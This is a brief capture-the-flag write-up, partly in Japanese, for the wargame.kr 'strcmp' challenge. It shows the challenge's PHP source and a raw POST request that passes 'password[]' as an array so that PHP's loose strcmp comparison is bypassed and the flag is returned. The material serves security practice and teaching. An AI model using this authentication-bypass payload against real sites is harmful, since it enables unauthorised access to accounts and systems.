Web Form Bypass Note
1. strcmp bypass
http://wargame.kr:8080/strcmp/
...
$password = sha1(md5(rand().file_get_contents("/var/lib/dummy_file")).rand());
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}else if(isset($_POST['password'])){
sleep(1); // do not brute force!
if (strcmp($_POST['password'], $password) == 0) {
echo "Congratulations! Flag is <b>" . auth_code("strcmp") ."</b>";
exit();
} else {
echo "Wrong password..";
}
}
HTTPリクエスト:
POST http://wargame.kr:8080/strcmp/ HTTP/1.1 Host: wargame.kr:8080 Connection: keep-alive Content-Length: 16 Cache-Control: max-age=0 Origin: http://wargame.kr:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng, /;q=0.8 Referer: http://wargame.kr:8080/strcmp/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,ja;q=0.8 Cookie: PHPSESSID=pmn3gck...(省略)
password=%5B%5D1
PHPのstrcmp関数をBypassするには、渡す要素を勝手に配列に変換すれば良いです。 HTTPリクエストのpassword=数値をpassword[]=数値に変換すれば良いです。